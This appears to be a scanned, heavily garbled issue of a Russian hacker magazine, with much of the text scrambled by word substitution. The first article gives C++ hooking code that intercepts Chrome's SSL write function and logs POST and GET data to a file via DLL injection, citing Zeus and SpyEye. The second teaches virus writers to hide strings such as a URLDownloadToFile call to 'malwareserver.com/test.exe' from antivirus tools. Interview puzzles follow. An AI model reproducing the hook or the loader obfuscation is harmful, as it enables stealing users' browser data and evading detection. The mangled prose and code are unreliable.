смогли становиться явью во другом месте. Чт обы что до пр еде брызгать , сколько в точности байтов чертить да идеже рамки случающийся инструк­

{ i f ( * szMask=='х' return false ;

&&

* pData !=* bMas k )

ции, на нормальных сплайсинг-движках по большей части используется д изассемб л е р длины . Так вот, на заключение грудь со скопированными инст р укциями д о­

return ( *s zMask )==NULL;

писывается JMP, передовой возьми [адрес функции+ общее число дл ан первых инструкций]. Таким образом, пользу кого вызова по части риг равным образом н альной функции достаточно облечь плотью и кровью «JMP а др ес_буфера>> .

DWORD FindPattern _( DWORD dwAddress, DWORD dwSize, ВУТЕ * pbMask, char * szMask

Несмотря получи и распишись в таком случае почто второстепенный порядок много стабильнее, в процессе исследований ваш покорный слуга реализовал центральный способ, та ко в духе симпатия

уймись [код смо три н а диске] .

for ( DWORD i=NULL; i < dwSize; i++ )

{

Функция-перехватчик, записывающая стать во файл, с целью него выглядит в такой мере :

АЛЬТЕРНАТИВНЫЕ ПУТИ ПЕРЕХВАТА Существуют да часть пути преимущества нашей цели. Например,

одиночный с участников форума

От себя могу добавить, что такое? позволено занимать место PR_Wгite на таблице

методов , ввиду местожительство этой функции берется с таблицы comblпed_

openws подина ником akademikeг nредложил лерехватывать функцию PR_Wгite ly него получилось-таки ее найти],

methods,

ась? nозволяет минуя особых усилий притирать nод Chгome исходники

на WiпDBG присутствие трассировке функции SSLCiieпtSocketNSS :: DoPayload

Zeus !само собой, на исследовательских целях].

Wгite lсм. чалтык 0] . При использовании сего слоеоба исполняемый адрес

Сигнатура на nоиска

детектирования перехватов . Чтобы его реализовать, нужно нажить

что-то малограмотный отражается во исходниках, зато отчётливо проявляется

невыгодный модифицируется, который позволяет обмануть есть такие аппаратура

/1

PR_Write

сигнатурка

адресочек таблицы comblпed_methods равно прийти держи смену во нем домицилий PR_Wгite

char * Sigп="\хВЬ\х4с\х24\хе4\х57\хеВ\хее\хее\хее\хее\хВЬ

по части смещению

\xf8\x85\xff\x75\xeS\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xЫ

доброжелатель насчёт й прием перехвата , отличающийся с всех предыдущих . Он

\хЗВ\хе2\хее\хее" ;

перехватывает TгanslateMessage , nозволяя замечать из-за тем, зачем вводит

01

ламер от клавиатуры , а и функцию

маскарон

char * Mask=" xxxxxx????xxxxxxxxxxxxxxxxxxx " ;

OCh бери адресок своей функции . SpyEye использует

ZwReadFile, которая

выдаёт адреса посещаемых сайтов да требования ко ним !подробнее читай на goo .gl/xTX9j] . В общем , очищать изо зачем найти .

ХАКЕР

03/158/2012

091


КОДИНГ

leave ret :SSLClientSocketNSS: :DoPayloadWrite : mov sub and push push mov mov mov mov mov push push call Рис .

ebp , esp esp,OCh dword ptr [ebp-OCh],O es1 edi edi,ea:к ea:к,dword ed:к , dword ec:к , dword еа:к dword

ptr ptr ptr tr

edi+ODOh] edi+OD4h] еа:к+В]

edi+l.A.Ch

I

ее :к

е а :к

dword

0. Comblned_methods во SSLCiientSocketNSS:: DoPayloadWrite

__declspec ( naked ) int Hooked_SSLWrite( DWORD buf, int buf_len, void * callback)

Writelog(LogFile,*( char**)(buf+B)); IsPostData=true ; else if ((strncmp(( LPCSTR)*( char**)(buf+S), "GET" , l strlen( "GET" ))==B) 01 IsPostData)

static bool IsPostData; Writelog( LogFile,*( char**)(buf+8)); IsPostData=false ;

__ asm push еЬр; mov ebp,esp; push еЬх; push esi; push edi; push ecx; //argument

__asm рор

еах;

рор

edi; esi;

рор

рор еЬх;

leave ; ret ech ;

/ 0 Восстанавливаем начальную часть /1 ори ги нальной функции ChromeHook.UnsetSplicing(); TrueSSLWrite=(SSLWrite)ChromeHook . GetHookedFunc();

Модификатор

01 Вызов _asm

оригинальной функции

{

__ declspec[naked]

на данном случае исnользу­

ется nотому, почто единодержавно с nараметров передается неграмотный чрез стек,

а сквозь список есх. Это значит, что-то нам подобает не потерять его, прежде нежели возлюбленный изменится, равно воссоздать накануне вызова оригиналь­

ecx; // argument mov eax,callback; push еах; mov eax,buf_len; push еах; mov eax,buf; push еах; call TrueSSLWrite; push еах; рор

утнапиштим функции.

Ничего удивительного на подобной nередаче параметров нет- сие эдак называемый

thiscall,

исnользуемый для того вызова

методов класса [ведь наша занятие представляет из себя метод Wгite класса

SSLCiientSocketNSS].

Через медиум есх таким

образом nередается надсыл объекта, про которо г относительно вызывается метод.

ЗАКЛЮЧЕНИЕ Остается только лишь насадить код-перехватчик во эксплуатация браузера

[я исnользовал классическое DLL-инжектирование] - да готово!

01

Возвращаем сnлайсинг

ChromeHook.ReSplice();

Однако у

Google

Chгome несть процессов, а стрелять функ­

ции нужно чинно на оnределенном, имеющем визуальную форму с названием активной вкладки. В других nроцессах отправления

if ((strncmp((LPCSTR)*( char**)(buf+8), "POST" ,lstrlen( "POST" ))==8))

несложно отнюдь не склифосовский исnользоваться . В принциnе, с намерением невыгодный замо­ рачиваться из nоиском нужного nроцесса Хрома, позволяется nросто

насадить устройство кайфовый совершенно nроце ссы. Хуже ото сего никак не будет. :Х:

092

ХАКЕР

03 /158/ 0012


. кодинг

Peter and the Wolf (peterandthewolffareal.xakep.ru l ·

~

И целого РАСШИРЯЕМ возможности ПРЕПРОЦЕССОРА

Одной с таких задач являет ся банальное скры т ие текстовых строк на коде пр ограммы. Скрывать их д ействительно н ужно -они открытым текстом помогают аверам да исследователям,

которым лишь только дай поизмываться по-над очередн ы м вирусным чудом.

Др угое дело- как? Н у, шифровать, да вроде произвести эт насчёт удобно? П ред­

ставь, нашел ть у тебя пр ограмма не без; видишь таким вона вызовом [утрирую] :

С/С++ С ПОМОЩЬЮ

URLDownloadToFile(NULL, "http: //malwareserver.com/ test .exe" , "C: \\test.exe" , е , NULL);

СТОРОННЕГО КОДОГЕНЕРАТОРА

URLD ownload ToFi le,

присутствие сборке программы изумительно поместятся

во сек ци ю .гdata сиречь

.data

Обе не без; тр оки, передаваемые на параметрах ко функции в открытом виде. Хот ь hех-редактором от­

крывай. В через ко д еры да извращаются, пишут отдель н ую пр ограмму,

шифрующую ст р оки, а после п одс тавляют з нач ения из функцией ­ декриптаром как-нибуд ь так:

При разработке хакерских программ

URLDownloadToFile( NULL,

да утилит [особенно вирусного толка] нередко

. . . " ), Decrypt( "\x 05 \x 0C \x 0A\x12\xe3 .•. " ),

Decrypt( " \x eE \x 02 \x 02 \x lб \x 0C

встречаются задачи, которые этот номер не пройдет

разрешить силами обычного препроцессора Си .

е,

NULL);

Это задачи, требующие вычислений, нехай

равным образом тривиальных, только вновь ДО компиляции.

Всё бы ничего, лишь ручной зашифровывать равным образом на ставля ть каждую строчку - сие пиковое положение . Было бы на ми лли что касается н в один из дней приятнее нап да ­

Сегодня наша сестра обсудим нераздельно сильнее либо не в этакий мере

сать тот или иной макрос, какой по прямой туточки же, пр озрачно к

всеохватывающий приём решения подобных

тебя, шифровал бы строку. Однако препроцессор Си на со вр еме н ных ком п иляторах поддерживает весть по части г раниченный ассортимент директив,

задач ,с через Питона.

со через ко т орого строку до дна невыгодный , как бы ни пытай­

ся. Чтобы безвыгодный кодировать строки руками [а в свой черед автоматизировать ~~ а Е)

-.

"'

ill

t•

д ругие подобные процессы], желательно выдумать какой-то костыль.

--

0:.""-llloo""'"'._~ l- "" w.-Q ... .. ~ g !q, о!3 f'!f: !1

0 O Q Ol!iiiOfJ

•·-1!-

в отношении - t~ -

"""-1

Сайт проекта

Cog

сверху сервера автора:

пedbatchelder.com/

code/cog. .... . .....uct . ...... , ......._ . . . , ... _

названием Cog [ http :Upypi . python . o гg / pyp i/cogapp ]. Автор получи зывает

_...,,"1_.......,.....,..........................._,0"'""'-'"'"'''"""'""'''-

J

, . ,fl_ll/'/o 11111_6...,.1t"a\\<ooi,..., ' JIII

~ 0 "10oll\a.0<'\ . .1>\. . U\~.... \I/o lt\0.U\0.4r,081»\ . . I'I\Cio/d' l

0•111-111"1·

nn•-11· • Ь.!> ,

о.оо ,

оо.

... ..,.., ,

о.ос ,

,."11

об по отношению 00 ,

.,... , ...,,

~.::~i:;~· -·

ro;;;-•a

,.....а...,.

О.>О,

.. ><.

О.1'1 ,

ОО.И ,

o.o r ,

hи ,

o.or,

Чтобы безвыгодный копировать в отдельный файл твоего проекта

Jf] o..J

•~·-

094

небольшие фрагменты программ нате П итоне на качестве генера т оров

Cog 'a дозволено напустить получай тв ой

сорец, равно возлюбленный н айдет на нем зарегистрированный специальными метками шифр

опи сы ваемые

на первом

держи Пит оне, выполнит е г относительно да во со тавит исход наоборот во первообразный

внедряемом

шифр . К п римеру, скормим

отхерачить их на сво й руthоп-модуль и да от пользовать его

Процесс смешанной разработки

е г относительно инструментом с целью кодогенерации, п озволяющим испол ь зовать

на исходниках. В общем, таково да есть,

функции,

фрагменте , дозволительно

· - ~ - -~ ·-... ., -.,1~ .... -

сипед, во этой статье наша сестра сего совершать далеко не буд ем, а воспользуемся го­ товым равным образом сейчас заточе нн ым п од наши цели продуктом-костылем почти

••

·~~.=="' -·· "'- ·- ·-· · -· ·

# !11_ ... _ , ...............

КОДОГЕНЕРАТОР НА РУТНОN Несмотря сверху то, сколько хакеры денно и нощно да на каждом шагу любят выдумывать вело­

наместо модуля

/1

Cog'y во через экий обложка равно ко :

Это обыдённый обложка С++

cog .

/* [[ [cog

ХАКЕР

03 /15В/ 0012


И целого Си недовольно

import cog fnames=[ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

]]] */ 1J [ [ [ end ] ] ]

В результате обложка бросьте модифицирован вишь этак :

/1

Это заурядный фай л С++

/ * [[[cog import cog fnames=[ 'DoSomething' , 'DoAnotherThing' , 'DolastThing' ] for fn in fnames: cog.outl( "void %s();" % fn)

Выполнив коман д у

python.exe cog.py -r test.cpp,

идеже

ными строками!

URLDownloadToFile( NULL, //[[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]J Decrypt( "\exeE\exl2\exl2\ex16\0x5C ••. " ) /* [[ [ end] ]] */ , // [ [[ cog Encrypt( "C:\\test.exe" ) ] ] ] Decrypt ( "\0x25\0x5C\0x3A\0x12\0x03 •.• " ) 1* [ [ [end]] ] */ , е,

NULL); Чтобы безграмотный шибать ко д а г енератор вручную, не грех на

] ] ] */

Studio

void DoSomething(); void DoAnotherThing(); void DolastThing(); // [ [ [ end] ] ]

Между метками

[[[cog

test.

срр- сие н аш файл, наш брат п по отношению л у чим завершающий адрес со уже е зашифрован­

Visual

приплюсовать его во роспись коман д , вызыва емых под компи­

ляцией твоего проекта. Те перь если бы твоя милость захочешь реформировать зна­ чение шифруемой строки, д ос тат очно прост по части п оме нять параметр Encгypt на соg-скрипте, автоматизированный помещать нисколько безвыгодный пр да д ется.

равным образом

]]]

располагается шифр получи и распишись Питоне,

Пр равно использовании такого мощного ан струме нта равно как П итон, воз­

производящий адрес получи и распишись Си, что склифосовский вставлен на строки среди

можностей чтобы кодагенерации по отношению т крывается уйм а . Наприм е р ,

метками

может единожды равным образом на веки вечные сменить утоми тельное применение

]]]

равно

[[[end]]] . Если Cog

впустить заново, так дьявол вначале

удалит архаический сгенерированный шифр бери Си, а после опять выполнит код генератора равным образом запишет новомодный окончание на файл. Как ты, наверное, заметил, сверх специальных маркеров адрес

Cog

biп2h пользу кого внедрения бинарных файло во во первообразный шифр пр по части грам­ мы. Для сего хватает реа ли зоват ь функцию biп2h да во ста вить ее, как бы да на примере выше, на п ервый эпизод стих держи Питоне :

бери Питоне покамест выносится во комментарий. Это нужно на того , что­

бы писатель Си невыгодный пытался скомпилировать до этого времени да шифр сверху Питоне -у него далеко не получится.

Для вывода результата кодагенерации используются функции

out равно оutllаналогичен out, всего добавляет назначение строки на ко­ нец) модуля cog. Если во исходном коде кушать мало-мальски фрагментов сверху Питоне, они будут проводиться в духе единственный руthоп - скрипт. Следовательно,

def bin2h(filename, valuename): data=open(filename, 'rb' ).read() cog.out l ( BYТE %s[] {о % valuename) for byte in data : cog.out( оех%е2Х, % ord(byte)) cog.outl( '}' ) cog.outl( 'DWORD %s_size=%d;o % (valuename, len(data))) 0

рекомендательно во всех направлениях вытворять экспорт модуля равным образом тому подобное.

Теперь, при случае автор сих строк захотим отхерачить бинарник на свой сорец !это пригодилось бы во статье для разработку РЕ- у паковщика) , так на­

ШИФРОВАНИЕ СТРОК Давай ныне попробуем понаписать скрипт к скрытия текстовых

пишем так:

строк изо заключение программы. В начале нашего исходника получи и распишись Си за­ грузим часть

Cog

равно определим функцию шифрования- допустим сие

хорошенького понемножку общепринятый хог:

Что преобразуется во вещь слыхать этого:

/* [ [ [cog import cog key=ехбб . def Encrypt(str): cog.out( 'Decrypt( "' ) cog.out( "" .join([ '\\ 0 +

// [[[cog bin2 h( "test.biп" , "test" ) ] ] ] ВУТЕ test[)={ ех2з , ехб9 , ехбЕ , ехбЗ , ехбС ...

01 ( " ех%е2Х "

продолжительный зад

% (ord(char) л key))

for char in str])) cog.out(

/ /[ [[cog bin2h( "test.bin" , "test" ) ]]] /* [[[end])] */

о") насчёт )

]]] [[[en d] ]] */

DWORD test_size=7079 ; / * [[[end])] */ , В функцию

bin2h

допускается подложить функцию шифрования либо

сжатия- в области вкусу.

Теперь можем подменять строкавые мера

URLDownloadToFi le для

вызовы

Encr ypt:

ЭТО НЕ КОНЕ Кодер, занимающийся вирусами, может попридумать миллиончик об чень

URLDownloadToFile( NULL, // [[[cog Encrypt( "http://malwareserver.com/test.exe" ) ]]] /* [[[e nd]] ] */ , / / [[[cog Encrypt( "C:\\test .exe" ) ]]] / * [[[ end]]] * / ,

милых применений стороннему кодоге н драчун тор у. Это может быть рандомизация т ех alias иных вызовов, разжижение стих высоко­ уровневым мусором, подсчет хеш ей име н функций чтобы соо твет­ ствующего поиска

API

равным образом круглым счетом ниже . Можно аж со п омощью СагеРу

будить ассемблерный ко д , тутовник а его наравне -ниб удь видоиз­ менять равно встав лят ь на сделано скомпилированном виде - мечта

е,

ограничивается всего лишь возможностями Пит возлюбленная со вс ем многооб ­

NULL);

разием его модулей . ::х::

ХАКЕР

03/158/2012

095


со еседованиях ПОДБОРКА ИНТЕРЕСНЫХ ЗАДАНИЙ, КОТОРЫХ ДАЮТ НА СОБЕСЕДОВАНИЯХ В этом выпуске пишущий эти строки добавил для обещанным на

УСЛОВИЕ

стародавний разок задачам цифра задачек держи

Встретились д на а старых друга, далеко не видевшиеся еще порядочно истинно во но.

догадка равно логику. Как показывает

-Я слышал, у тебя детвора появились.

практика, их адски любят работодатели.

-Д а, три сы н а.

Конкретно сей подбор логических задач мне дали в собеседовании на одной крупной интернет- компании. На вотум общем перечня

отводилось

00

минут- ваш покорный слуга почувствовал себя

наравне во школе для контрольной .. .

Оба некогда с учились получи и распишись Физтехе. Вот их д иалог:

-И как долго им л ет? - Ну ... В сумме тринадцать!

- Хм ... За г адками хочешь говорить? Н у ладно. И который единаче можешь сказать?

-Если их возрасты перемножить, получится что однова столько, ско л ько очес н у на что касается - о-он того д ома.

-Н насчёт зто г по отношению на сё е щ е мало!

-Мо г у д обавить, ч т что до муж из т ар ш ий сыночек рыжий.

-Ну, днесь положительно другое деятельность . Им

... [далее сле д ует ответ!

-П равильно!

Сколько но полет было каж д ому сыну?

096

ХАКЕР

03/158/2012


Задачи держи собеседованиях

РЕШЕНИЕ

УСЛОВИЕ

Возможно, основной но у точняющи й на в отношении пр ос, тот или другой возникнетутебя

Есть три урны из шара ми, как бы во после дач ках в области теории вероятности. Н а

во знакомства из этой задачей, склифосовский касательно т ом, наравне счи разбойник ок держи «у изумительный - об - некто того

перво й написано << ЧЕРНЫЕ >>, в втор ой - « БЕЛЫЕ >>, получай третьей­

дома>>. Ответ: сие кого хошь спроси просто-напросто у частни кам беседы.:] Но да мы от тобой неб у­

«Ч ЕРНЫЕ И БЕЛЫЕ >>. В об дн ой, соответственно, ле жа т белые шары,

д ем уныва ть да составим до этого времени возможные варианты количества окон.

на др у г ой - черные, на оставшейся- равно черны е, равным образом белые. Однако однако

П ока дух усишко хватай е- совокупность множителей должна являться равна

надписи в ур нате х очевидно ложны. Разр е шае тся д ос вор тольк относительно

03:

что до д ан карамболина тольк что до с по отношению дн ой ур ны . Как определить, во какой-либо ур н е какие

0 1 1 1 1

• • • •

*

0 •

0

0 2 3 4 5 б

* * * * *

0 2 3 2 4 5 2 3 3 3 • 0 3 • 0 4 • 0

• 01=· 01 • 0е=2е • 0 27 • 0 32 • 0 35 • б 36 * 0 06 • 0 48 56 • 0 • б бе • 0 б3 • б 72 • 0 75 • 0 8е

моргалки лежат?

РЕШЕНИЕ Из того, сколько н а дписи фактически л ожны, дозволительно из вытворять следующие выводы :

на ур малограмотный «Ч ЕРНЫЕ>> либотолько бе лые моргалы , либо черные равным образом белые; в урне « БЕЛЫЕ >> либотолько черные шары, либо черные равно белые;

на урне « ЧЕРНЫЕ И БЕЛЫЕ >> либотолько белые шары, ли ибо т олько черные

.

Е вместе с ли я возьмем оборот с ур ны « ЧЕРНЫЕ И БЕЛЫЕ >> да дьявол окажется ч ерным, значит, во э пирушка у рн е ТОЛЬКО ч ер ные шары. Это однозначно указы вает бери так , что:

на у рне « БЕЛЫЕ» черные да белые шары, приближенно в духе лишь только черные у нас в урне « ЧЕРНЫЕ И БЕЛЫЕ >>;

Вариантов оказалос ь н е та ко много, их позволено выпи сать ради не­

на урне « ЧЕРНЫЕ >> только лишь белые шары, в такой мере во вкусе черные равным образом белые во

какое количество минут. Заметь, ась? пр оиз вед е ния возрастов совпадают

ведь ль ко на дв ух случаях:

0*6*6 да 0*2*9.

урне « БЕЛЫЕ>>.

Пол у ча е тся, сколько разве бы з д а ние

имело л юбое пр е длож е нн ое ко личе из тво очес н , выключая

06, в таком случае

противоречие

не грех бы ло бы доставить сразу, впрочем насчёт дин с др узей сказал, что-то «этого

Н у равно соответствующие выводы позволяется сделать, вынув безграмотный ч ер ны й

шар, а мертвец . Таким образом , на озмож ны х распределений миллион рублей ов

всё е щ е скудно >>. Это самоочевидно подводит нас ко мысли, чт относительно сыно вьям

сумме два:

либо од равно н год, ш принимать полет равным образом ше от ть лет, либо двойка годы , пара время а равно девять

0. 2.

лет. Далее выше- папаша выдает со ледую щ ую фразу: «Мо г у вплоть до ба скручивать ,

БЕЛЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

ЧЕРНЫЕ И БЕЛЫЕ

ЧЕРНЫЕ

БЕЛЫЕ

ась? мои вместе с тарший вместе с ын рыжиЙ >>. Сначала симпатия выглядела совершенно бес п в рассуждении ле з н ой, однако оный ча из всё от тало понятно. Главное со л в рассуждении во по отношению на н ей н е « рыжий>>, на правах могло временно следовать ться получай стержневой созерцание , а «стар ш иЙ>>. Из

наших варианто во

В зависимос ти в рассуждении т т относительно го, какой-нибудь мир наш брат вын ем изо третьей урны, будет владеть мес т в рассуждении либо первое, либо втор ое.

[1-6-6 да 0-2-9] толь ко во одном нет переводу старший сын.

Сле д ова те льно, правильны й ответ- двушник годы , двоечка возраст да девять лет.

УСЛОВИЕ В базе данных Огасlе имеются двум та б лицы вместе с касательно динаковым получай потому что р ом

УСЛОВИЕ

колонок. Выведите данны е, которые питаться во одной таблице, же что до т­

Дан крупный конгломерат данны х во файле [миллион записей]. Задача:

сутствуют во другой.

загрузи ть информация на таблицу, используя квакало программирован ия

РЕШЕНИЕ

Pythoп .

Д ля ясности опре дел имся со форматами таблиц. Следующие двойка

РЕШЕНИЕ

запроса создают двум под масть таблицы вместе с именами

test1

да

test2,

В качест ве СУБД пользу кого разнообразия используем Огасlе . Для работы

которые содержа т информацию [наименов а н ие пр что до дук т а равным образом ц е на] относительно

не без; н ей во Питоне перед усмотрен внеочередной узел сх_Огасlе, исключая

экой -ниб удь абстрактной прод ук ции:

него бери нашем компьютере об язательно д по отношению л ж сверху состоять клиентская

дробь СУБД Огасlе .

CREATE TABLE testl(prod VARCHAR(le), price INT); CREATE TABLE test2(prod VARCHAR(1e), price INT);

import cx_Oracle Для решения этой ради д ачи нам нужно пускать в ход в рассуждении дин да з опе­

#

раторов се мейства

Соединяемся из базой

со пn

=cx_Oracle.connect(' system/ qwerty@XE' ) cur=coпn.cursor()

JOIN , которые

позв в отношении ляют объе динять далеко не ско лько

колонок изо разных таблиц во относительно дн у. В нашем вместе с л уч а е использование LEFТ

JOIN

обус л овлено т ем, что-то автор должны поднять весь ежедневник с

левой таблицы [первой], так чтобы понять, какие с них отсу тств устроенность на

#

Через орудие итераторов nострочно добавляем ежедневник с

файла

правой [второй]. Условий объе динения таблиц у получай от хорэ два- п о количест во у столбц по отношению на . Соответственно, для того паче вместе с ложны х таблиц

на таблицу

for line in open( 'file.txt' ) : cur. execute( "INSERT INTO test VALUES { :s) " , s=line)

н контия так пер еч ислить однако сто лбцы . В конце д е кларир у ем соглашение

«WHERE test3.pгod IS NULL>>, которое

означает, зачем нас интересу­

юттолько записи, отсутствующие изумительный втор ой таблице. Пр равно т аком

#

Сохраняем изменения,

закрываем связывание

объедине нии относительно ни несомненно надстройка ерунда з н ачение:

c ur .ex ecute{ 'COММIT' )

cur. close() Хо ч у что касается т метить, что-нибудь возле добавлении данны х на паче вместе с ложные

0ДЕСТ testl. * FROM testl LEFТ ..JOIN test3 ON test1.prod=test2.prod AND test1.price=test2.price WHERE test2.prod IS NULL;

таблиц ы со индексами равно ключами л уч ше до отключить их получи и распишись время, та для равно как н а их счет может убраться бог не обидел времени . В

Е сли у нас на таблице очищать у никальный идентификатор записи, так

качестве альтернативы позволено мудрить исходняк че ре з временн ую

указы вать его подле запросе на усло вии в целях

таблицу.

та для равно как третьяк равно такса вп об лн е могут существовать относительно динак овыми, а идентифи-

ХАКЕР

03 /158/ 0012

JOIN,

на принципе, малограмотный надо,

097


КОДИНГ

последовательных чисел. Правильно- посредь ними. А беспричинно на правах мы·

ЗАДАЧИ В СЛЕДУЮЩЕМ ВЫПУСКЕ

рассматриваем всего лишь последовательные простые числа, в таком случае посредь

ними ещё одного простого числа существовать безвыгодный может. Следовательно, полусумма двух последовательных простых чисел, начиная из трех,

цифра составное. Что равным образом требовалось доказать.

0.

Написать функцию, которая хорош стяжать возьми входдва списка и возвращать словарь, во котором ключи- основы п ервого

списка,'а значения - простейшие положения второго списка иначе Nопе, если соответствующий звено отсутствует.

Необходимо:

>>> а=[ "а" , "Ь" , "с" ] »> ь=[ 0, 0 ] >>> print dictify(a,b) { "а" :

0,

"Ь" :

0,

"с" :

УСЛОВИЕ Возникло подозрение, в чем дело? одиночный изо твоих веб - серверов взломан. а.

проэкзаменовать систему держи наука руткитов,

б.

бери завтрашний день настроить уве домлени е администратора об малейшей подозрительной активности, возникающей сверху сервере иначе говоря на­ правленной бери него .

None}

РЕШЕНИЕ

0.

Есть следующая функция:

Сперва надлежит определиться, сколько ради ОС игра стоит свеч в сервере . В случае, если бы сервер лещадь *пiх, моя особа бы воспользовался ёбаный

def myappend(a=[], num a.append(num) print а

пр ограммой, в духе chkгootkit. Она безграмотный всего только проверяет систему получай

0 ):

присутствие руткита в, только равным образом выявляет аномальную активность, напри­

мер устранение записей с сис темны х журналов. Chkгootkit вкушать

Определить, что-нибудь склифосовский проис ступать быть выполнении следующего кода равно в какую цену у:

»> »> »> »> >» »> »>

а

на репазитариях большинства дистрибутивов, приближенно аюшки? проблем с ее пасть новкой возникн у ть невыгодный должно. Ещё двум альтернативные программы со похожим функцианалом-это гkhuпteг да

=

unhide . Для

винды существует г ораз давно сильнее ПО, обнаруживающего руткиты.

[ 0 , 0, 0] myappend(a) myappend() myappend() а={ 0 : 0, 0 :4 } myappend(*a) myappend(**a)

Полный роспись таких программ постойте по части ссылке http:!/goo.gi/9HXEt . Из популярных могу посватать

GMER

тож

RootRepeal.

Кроме

того, разве сервер находится во корпоративной сре мол , на ней наверня­ ка централизованно до точки ПО какого-либо антивирусного вен­ дара, которое приземленно всякий раз имеет на своем арсенале модули

в целях борьбы от руткитам и. Решить задачу не без; уведом лением системного администратора по отношению разнообразной подозрительной активности

0.

Написать класс, какой-никакой хранит оглавление своих экземпляров равным образом по­

поможет спе циальное ПО подо названием « режим обнаружения

вторжений» IIDS- intгusion detectioп systeml . В нынешнее промежуток времени

зволяет итерировать по мнению ним.

существует общий группа таких систем. Нужно наметить т у систему, которая годится согласно требованиям. Для поодиночке стоящего сервера

»> а=Keeper() »> ь=Keeper() »> for i in Keeper.list_instances(): print i <K eeper instance at

ех

автор бы использовал правильный Sпогt либо но паче современную Suгicata . Это ПО вместе с открытыми кодами, а сле д ова тельно, оно распро­

...

страняется бесплатно. Для обнаружения подозрительных действий с веб-сервером используются файерволы уровня веб-приложения

0.

IWAF- we b application fiгewa l li, которые могут присутствовать встроены на

Что сие равно аюшки? не без; сим дозволено сделать?

конкретное адденда alias представпять с лица отдельное ПО.

089/tcp

open

ldap

(Anonymous bind

ОК)

УСЛОВИЕ В центре в совершенстве круглого озера плавает утка, а получай берегу си дит лиса . Утке нужно улететь, хотя возлюбленная может подскочить всего лишь от берега . катары разными не мудрствуя лукаво потому, сколько они были добавлены на таблицы

Скорость лисы на хорошо раза лишше скорости утки . Лиса хочет

на разном порядке сиречь на вариа время.

боднуть утку, да никак не умеет плавать. Сможет ли нырок избегнуть через лисы?

УСЛОВИЕ Доказать , ась? полусумма дву х nоследовательных пр остых чисел, начиная не без; трех, представляет собою составное состав .

РЕШЕНИЕ Пер сенажи на задаче могут варьироваться !вместо лисы- орк, а вместо утки - хоббит на лодке да т. д . l, только лейтмотив остается оный же. Ещё добавлю, что-то тост отлично касательно максимальной скорости лисы, хотя возлюбленная от

РЕШЕНИЕ П онятие составного числа наша сестра встречаем невыгодный кажинный день, благодаря тому

позволю себя подсказать определение: составное число- сие на­ туральное цифра хлеще единицы, которое малограмотный является простым . Рассмотрим закономерность:

усишко пешочком может двигат ься не без; меньшей скоростью иначе говоря общий ждать, иными словами, симпатия Идеально Логичное Существо.

Для решения задачи нам нужно восстановить в памяти формулу длины

0=2 * pi * R, где R- радиус окружности. Очевидно, сколько про получения максималь­ окружнос ти , так-таки то есть по мнению ней хорэ летать лиса:

утнапиштим форы утке надобно отправиться во противоположную через лисы

0 + 0=8 5 + 0=12 7 + 01=18

сторону. В таком случае утке нужно хорош миновать дистанция

а лисе миновать

0/2, так

R,

убирать pi * R. Скорость лисы на четверик раза

свыше скорости утки, однако расстояние, которое ей нужно преодолеть, всего как только на

0,14 раза

больше, нежели расстояние, которое н стрела-змея только про­

следовать у тке , того лиса вначале окажется на книга месте, гораздо должна

Отсюда видно, почто весь простые числа нечетные, а двуха нечетных

попасть утка. Следовательно, утке невыгодный предопределено улететь. Казалось

числа во сумме дают четное, почему полусумма простых чисел­

бы, всё порядочно просто, однако безграмотный тут-то было! Это автор этих строк понял , когда-никогда в

сие натуральное число, ведь принимать дробной части оно далеко не имеет. Теперь

собеседовании ми задали вопрос: <<А существует ли стратегия, по­

представим, идеже получай числовой неприкрытый расположена половая принадлежность усумма двух

зволяющая утке во конце концов достичь до самого бе рега да улететь?»

098

ХАКЕР

03/158/2012


Задачи получай собеседованиях

Да , такая поведение су щ ествует, да видишь во нежели симпатия заключается. Для простоты предположим, чт что до радиус озера цифра метра. П ер во ое,

#

Формируем очере~ь

urlsPool

URL

=Queue.Queue( e )

зачем нужно от д елать у т ке, - зто выпл ы ть получи округа не без; взыграла душа иусом на

#Кладем URL'ы во караван

четверка раза не так исходной la даже если фигурировать нисколько точным, вместе с радиу­ сом г < 0/pi * R/41 равно от центром во пирушка но точке таким образом, дабы

for url in open(sys.argv[- 0], 'r' ): urlsPool . put{url)

угадать в м аксимальном удалении касательно т ли сы. Утка, ц е революция озера равно

#

лиса д относительно л жны разыскиваться получи и распишись касательно поддон й прямой. Утке крюк стся з т в отношении вместе с делать,

for

где-то по образу ее угл овая быстрота близ дви а нии п что касается окружности со радиу­

сом R/4 хорэ выше, нежели у лисы. Стало бы ть , утке давно берега оста­

Запускаем nотоки

х in xra nge(threads): DownloadThread() .start() urlsFile .c lose()

нется только лишь три ме тра , а лисе н еобходим относительно полноте насчет лететь на сё те

а

0/2, т в отношении питаться 02,56 метра 02 * 0,14 * 0/21. Волга ссто яние , которое нужно

УСЛОВИЕ

преод что до леть ли се, сейчас паче нежели во хорошо раза превыша ет тракт у тки ,

Есть дв е из лированны е др у г через др у га комнаты. В по части дной н ахо дят ся

а не без; л е д по части вательно , у т ка из п асена ' В об щ ем случае утке нужно выйти получи и распишись сверкание божий

три лампочки, на др угой -три выключателя. Ты стои шь во комна те из

получи околоток радиусом г< 0/pi

* R/4 метра так,

ради лиса, суть

выключателями равно можешь перекинуться на комнату не без; лампочками всего

окружнос ти да гага оказа ли вместе с ь бери одной откровенный . А далее формироваться

сам раз. Необходимо определить, какая лампочка каким выключа­

до кратчайшему пути ко берегу!

т елем включается.

Р.

Доп касательно лнит ельное после дание на гурманов:

S.

РЕШЕНИЕ

0.

Каким об р азом позволяется максимизировать отрыв утки ото лисы?

0.

При каком соотн об ш ении скоростей лиса гар антиро ванн по отношению поймает

Н аверное, насчет э т у ради дач ку слышали если бы н е во се, в таком случае многие. Р е ш а ­

утку?

ется возлюбленная полно прямо !если вспомнить, в чем дело? горящие лампочки имеют свойс тво нагреваться]: 1. Включаем единолично изо выключателей ! доп устим, первый].

УСЛОВИЕ Написать скрипт, считывающий роспись URL изо файла !одна строка - в отношении дин URLI, скачиваю суп й их безграмотный сильнее нежели на N потоков равным образом сохраняю­ щий каждую со тр аницу во отдельном файле.

N, вслед за д аваемое аргумен­ 10. Имена конечных

0. 3. 4.

томик командной строки, п что до обмол ч анию непропорционально

Ждем неко тор ое время, п ока поверхностьлампочки нагреется. Выключаем э т у лампочку. Включаем второстепенный прерыватель равным образом пойдем на другую кусок нат у смотреть на лампочки.

